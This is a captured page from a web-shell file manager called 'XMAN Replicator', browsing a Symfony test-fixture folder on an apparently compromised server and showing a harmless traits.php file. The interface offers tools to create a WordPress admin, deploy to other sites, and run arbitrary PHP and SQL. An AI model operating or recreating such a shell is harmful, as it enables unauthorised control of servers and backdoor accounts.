🛸 XMAN Replicator
English
Русский
Français
Quit
Path:
/
opt
/
alt
/
php53
/
usr
/
share
/
pear
/
test
/
ClassLoader
/
Symfony
/
Component
/
ClassLoader
/
Tests
/
Fixtures
/
deps
/
📋 نشر إلى المواقع
👤 إنشاء مشرف WP
Upload
Make directory
Name
Size
Rights
Date
Actions
[.]
<DIR>
drwxr-xr-x
2024-03-03 22:55
🔄
🗑️
🗑️📁
⬇️
🔒
[..]
<DIR>
drwxr-xr-x
2024-03-03 22:55
🔄
🗑️
🗑️📁
⬇️
🔒
traits.php
205 B
-rw-r--r--
2019-12-18 11:20
✏️
🔄
🗑️
⬇️
🔒
Edit: traits.php
<?php trait TD {} trait TZ { use TD; } trait TC { use TD; } trait TB { use TC; } trait TA { use TB; } class CTFoo { use TA; use TZ; } class CTBar { use TZ; use TA; }
Save
PHP Console
Execute
SQL Console
Execute